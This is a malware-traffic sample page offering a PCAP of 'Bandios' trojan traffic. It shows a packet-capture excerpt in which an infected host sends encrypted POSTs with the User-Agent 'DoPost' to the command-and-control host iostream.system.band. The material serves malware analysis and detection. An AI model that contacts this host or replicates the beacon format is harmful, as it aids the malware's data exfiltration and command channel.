Bandios Malware PCAP File Download Traffic Sample Trojan User-Agent DoPost

Download Attachments

1 18
Date added: May 24, 2019 12:02 am Added by: admin File size: 2 MB Downloads: 212

https://www.hybrid-analysis.com/sample/bd43289d2e616c78c9d5807b6c2f57028cd3d23aebc4111d7d689493b8c8c87a?environmentId=120

2018-03-23 04:45:31.046592 IP 192.168.100.237.49271 > 104.28.21.204.80: Flags [P.], seq 1:315, ack 1, win 16626, length 314: HTTP: POST /dump/io/time.php HTTP/1.1
E..b..@…Uw..d.h….w.PD7i.&.c.P.@.K…POST /dump/io/time.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: DoPost
Host: iostream.system.band
Content-Length: 136
Cache-Control: no-cache

A69FDDB2x7C2BrxvzjQ8OZMTbsB5t+gO+NmRXT9UyY4En+k8fKIMGya/Vpkm6fLyBpEg796OZbpuW6MWp4XLDz5H0Qf/N3iRp7u3PoFDZG2a6ixbG9/r+DODqsq2cgARtZcVkCXV
2018-03-23 04:45:31.075091 IP 104.28.21.204.80 > 192.168.100.237.49271: Flags [.], ack 315, win 134, length 0
E..(..@.?…h…..d..P.w&.c.D7j<P….K..

2018-03-23 04:45:31.132160 IP6 fe80::d459:17ea:b3ed:3d86.59450 > ff02::1:3.5355: UDP, length 22

2018-03-23 04:46:57.833513 IP 192.168.100.237.49816 > 104.28.20.204.80: Flags [.], ack 1, win 16626, length 0
E..(._@…W…d.h……P..A.A..P.@.:u.. 2018-03-23 04:46:57.833576 IP 192.168.100.237.49816 > 104.28.20.204.80: Flags [P.], seq 1:318, ack 1, win 16626, length 317: HTTP: POST /dump/io/weather.php HTTP/1.1 E..e.@…V…d.h……P`..A.A..P.@.4…POST /dump/io/weather.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: DoPost
Host: iostream.system.band
Content-Length: 136
Cache-Control: no-cache

29B71CBFfgeSYbPn5e/OAo6DOsp5nCrnb87b3PUMhbFp67pEFSiiF+t6oO+DraoJIXS0ZJNV8DU8Gz2WWMLhip2s4t2AfKY1LjyyRnnA7CTQQjTUEmOIc5j5h2C4B2bme2VRpIzi
2018-03-23 04:46:57.836529 IP6 fe80::d459:17ea:b3ed:3d86.58034 > ff02::1:3.5355: UDP, length 22
`…………….Y….=…………………….;0………..wpad…..

2018-03-23 04:46:57.836779 IP 192.168.100.237.59265 > 224.0.0.252.5355: UDP, length 22

2018-03-23 04:46:58.666540 IP 192.168.100.237.49829 > 104.28.20.204.80: Flags [.], ack 1, win 16626, length 0
E..(.h@…W…d.h……P.af1 .3lP.@..]..
2018-03-23 04:46:58.666639 IP 192.168.100.237.49829 > 104.28.20.204.80: Flags [P.], seq 1:380, ack 1, win 16626, length 379: HTTP: POST /dump/io/weather.php HTTP/1.1
E….i@…Vn..d.h……P.af1 .3lP.@.l…POST /dump/io/weather.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: DoPost
Host: iostream.system.band
Content-Length: 136
Cache-Control: no-cache
Cookie: __cfduid=df151adf43220521b3461fff9a74fa80a1521794817

4AA096BF7Bk/JrBtXdTT9NpC+mi03QZJcX1D9ZvN3lniBR5cifCwAqYQs7dzJymBuF2W8MfZHyH1bvK9kMHYtoqWtek46DiERnyKQwi/yB6KSlZFP33F03qtXPPAIky30s8djIXX

Please follow and like us: